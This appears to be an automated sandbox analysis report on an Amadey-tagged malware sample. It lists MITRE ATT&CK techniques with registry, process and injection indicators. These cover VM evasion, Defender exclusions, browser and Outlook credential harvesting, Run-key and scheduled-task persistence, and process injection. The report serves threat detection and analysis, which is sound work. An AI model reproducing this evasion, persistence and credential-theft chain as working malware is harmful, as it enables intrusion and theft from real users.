amadey | 2691c3893e96a1d16b1021b1dd25a2cd35106013f6c7eefed1360cc3d6e0cbe3

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	521f01c054.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	1164	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3212	powershell.exe
13296	powershell.exe
1164	powershell.exe

Downloads MZ/PE file 12 IoCs

flow	pid	Process
78	3408	MSBuild.exe
115	3408	MSBuild.exe
129	3408	MSBuild.exe
223	3408	MSBuild.exe
251	5800	svchost.exe
154	3408	MSBuild.exe
210	3408	MSBuild.exe
247	3408	MSBuild.exe
258	3408	MSBuild.exe
34	2756	rapes.exe
13	1164	powershell.exe
74	3408	MSBuild.exe

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
1016	msedge.exe
4420	msedge.exe
4204	msedge.exe
6100	chrome.exe
5684	chrome.exe
3120	msedge.exe
3784	msedge.exe
5732	chrome.exe
4744	chrome.exe
5808	chrome.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 25 IoCs

pid	Process
3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
2756	rapes.exe
876	ibC8xs1.exe
3624	exp.exe
4916	rapes.exe
4508	DgQBvwg.exe
4012	exp.exe
2344	v1BRaoR.exe
2636	Nehh6wZ.exe
6004	31W3sid.exe
5980	NlmvJyQ.exe
5124	31W3sid.exe
5828	DgQBvwg.exe
5136	exp.exe
1488	larBxd7.exe
5968	rapes.exe
3632	9sWdA2p.exe
6112	Rm3cVPI.exe
5240	v1BRaoR.exe
5136	ibC8xs1.exe
544	exp.exe
5024	UZPt0hR.exe
3912	tzutil.exe
5392	w32tm.exe
1608	521f01c054.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	521f01c054.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	MSBuild.exe

Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MSBuild.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
2756	rapes.exe
4916	rapes.exe
5968	rapes.exe

Suspicious use of SetThreadContext 26 IoCs

description	pid	Process	procid_target
PID 876 set thread context of 3408	876	ibC8xs1.exe	119
PID 3624 set thread context of 1652	3624	exp.exe	130
PID 3408 set thread context of 1100	3408	MSBuild.exe	131
PID 4508 set thread context of 3048	4508	DgQBvwg.exe	138
PID 3408 set thread context of 936	3408	MSBuild.exe	144
PID 2344 set thread context of 3184	2344	v1BRaoR.exe	151
PID 2636 set thread context of 400	2636	Nehh6wZ.exe	156
PID 4012 set thread context of 2376	4012	exp.exe	164
PID 3408 set thread context of 3808	3408	MSBuild.exe	170
PID 6004 set thread context of 6036	6004	31W3sid.exe	179
PID 3408 set thread context of 4708	3408	MSBuild.exe	190
PID 5980 set thread context of 1524	5980	NlmvJyQ.exe	192
PID 5124 set thread context of 5312	5124	31W3sid.exe	196
PID 3408 set thread context of 3864	3408	MSBuild.exe	197
PID 5828 set thread context of 5236	5828	DgQBvwg.exe	205
PID 3408 set thread context of 2524	3408	MSBuild.exe	210
PID 5136 set thread context of 2128	5136	exp.exe	215
PID 3408 set thread context of 5588	3408	MSBuild.exe	216
PID 3408 set thread context of 508	3408	MSBuild.exe	219
PID 3408 set thread context of 4464	3408	MSBuild.exe	221
PID 5240 set thread context of 4084	5240	v1BRaoR.exe	224
PID 3408 set thread context of 4740	3408	MSBuild.exe	225
PID 5136 set thread context of 4284	5136	ibC8xs1.exe	233
PID 3408 set thread context of 2196	3408	MSBuild.exe	242
PID 544 set thread context of 6088	544	exp.exe	243
PID 3408 set thread context of 5192	3408	MSBuild.exe	253

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	MSBuild.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5400	3184	WerFault.exe	151
1892	4084	WerFault.exe	224

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	521f01c054.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe

Checks processor information in registry 2 TTPs 21 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	MSBuild.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rundll32.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
512	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3408	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1164	powershell.exe
1164	powershell.exe
3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
2756	rapes.exe
2756	rapes.exe
876	ibC8xs1.exe
876	ibC8xs1.exe
876	ibC8xs1.exe
876	ibC8xs1.exe
4916	rapes.exe
4916	rapes.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe
3408	MSBuild.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5024	UZPt0hR.exe
5024	UZPt0hR.exe
5024	UZPt0hR.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
6100	chrome.exe
6100	chrome.exe
6100	chrome.exe
6100	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	876	ibC8xs1.exe
Token: SeDebugPrivilege	3624	exp.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	4508	DgQBvwg.exe
Token: SeDebugPrivilege	3408	MSBuild.exe
Token: SeDebugPrivilege	3184	MSBuild.exe
Token: SeIncreaseQuotaPrivilege	3184	MSBuild.exe
Token: SeSecurityPrivilege	3184	MSBuild.exe
Token: SeTakeOwnershipPrivilege	3184	MSBuild.exe
Token: SeLoadDriverPrivilege	3184	MSBuild.exe
Token: SeSystemProfilePrivilege	3184	MSBuild.exe
Token: SeSystemtimePrivilege	3184	MSBuild.exe
Token: SeProfSingleProcessPrivilege	3184	MSBuild.exe
Token: SeIncBasePriorityPrivilege	3184	MSBuild.exe
Token: SeCreatePagefilePrivilege	3184	MSBuild.exe
Token: SeBackupPrivilege	3184	MSBuild.exe
Token: SeRestorePrivilege	3184	MSBuild.exe
Token: SeShutdownPrivilege	3184	MSBuild.exe
Token: SeDebugPrivilege	3184	MSBuild.exe
Token: SeSystemEnvironmentPrivilege	3184	MSBuild.exe
Token: SeRemoteShutdownPrivilege	3184	MSBuild.exe
Token: SeUndockPrivilege	3184	MSBuild.exe
Token: SeManageVolumePrivilege	3184	MSBuild.exe
Token: 33	3184	MSBuild.exe
Token: 34	3184	MSBuild.exe
Token: 35	3184	MSBuild.exe
Token: 36	3184	MSBuild.exe
Token: SeIncreaseQuotaPrivilege	3184	MSBuild.exe
Token: SeSecurityPrivilege	3184	MSBuild.exe
Token: SeTakeOwnershipPrivilege	3184	MSBuild.exe
Token: SeLoadDriverPrivilege	3184	MSBuild.exe
Token: SeSystemProfilePrivilege	3184	MSBuild.exe
Token: SeSystemtimePrivilege	3184	MSBuild.exe
Token: SeProfSingleProcessPrivilege	3184	MSBuild.exe
Token: SeIncBasePriorityPrivilege	3184	MSBuild.exe
Token: SeCreatePagefilePrivilege	3184	MSBuild.exe
Token: SeBackupPrivilege	3184	MSBuild.exe
Token: SeRestorePrivilege	3184	MSBuild.exe
Token: SeShutdownPrivilege	3184	MSBuild.exe
Token: SeDebugPrivilege	3184	MSBuild.exe
Token: SeSystemEnvironmentPrivilege	3184	MSBuild.exe
Token: SeRemoteShutdownPrivilege	3184	MSBuild.exe
Token: SeUndockPrivilege	3184	MSBuild.exe

Suspicious use of FindShellTrayWindow 20 IoCs

pid	Process
2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
1100	rundll32.exe
936	rundll32.exe
3408	MSBuild.exe
1016	msedge.exe
1016	msedge.exe
3808	rundll32.exe
6100	chrome.exe
4708	rundll32.exe
3864	rundll32.exe
2524	rundll32.exe
5588	rundll32.exe
508	rundll32.exe
4464	rundll32.exe
4740	rundll32.exe
2196	rundll32.exe
5192	rundll32.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3408	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 2536	2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 2352 wrote to memory of 2536	2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 2352 wrote to memory of 2536	2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 2352 wrote to memory of 1768	2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 2352 wrote to memory of 1768	2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 2352 wrote to memory of 1768	2352	2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 2536 wrote to memory of 512	2536	cmd.exe	91
PID 2536 wrote to memory of 512	2536	cmd.exe	91
PID 2536 wrote to memory of 512	2536	cmd.exe	91
PID 1768 wrote to memory of 1164	1768	mshta.exe	93
PID 1768 wrote to memory of 1164	1768	mshta.exe	93
PID 1768 wrote to memory of 1164	1768	mshta.exe	93
PID 1164 wrote to memory of 3900	1164	powershell.exe	101
PID 1164 wrote to memory of 3900	1164	powershell.exe	101
PID 1164 wrote to memory of 3900	1164	powershell.exe	101
PID 3900 wrote to memory of 2756	3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE	103
PID 3900 wrote to memory of 2756	3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE	103
PID 3900 wrote to memory of 2756	3900	TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE	103
PID 2756 wrote to memory of 876	2756	rapes.exe	113
PID 2756 wrote to memory of 876	2756	rapes.exe	113
PID 876 wrote to memory of 4808	876	ibC8xs1.exe	114
PID 876 wrote to memory of 4808	876	ibC8xs1.exe	114
PID 4808 wrote to memory of 1628	4808	csc.exe	116
PID 4808 wrote to memory of 1628	4808	csc.exe	116
PID 876 wrote to memory of 1712	876	ibC8xs1.exe	117
PID 876 wrote to memory of 1712	876	ibC8xs1.exe	117
PID 876 wrote to memory of 1712	876	ibC8xs1.exe	117
PID 876 wrote to memory of 4352	876	ibC8xs1.exe	118
PID 876 wrote to memory of 4352	876	ibC8xs1.exe	118
PID 876 wrote to memory of 4352	876	ibC8xs1.exe	118
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
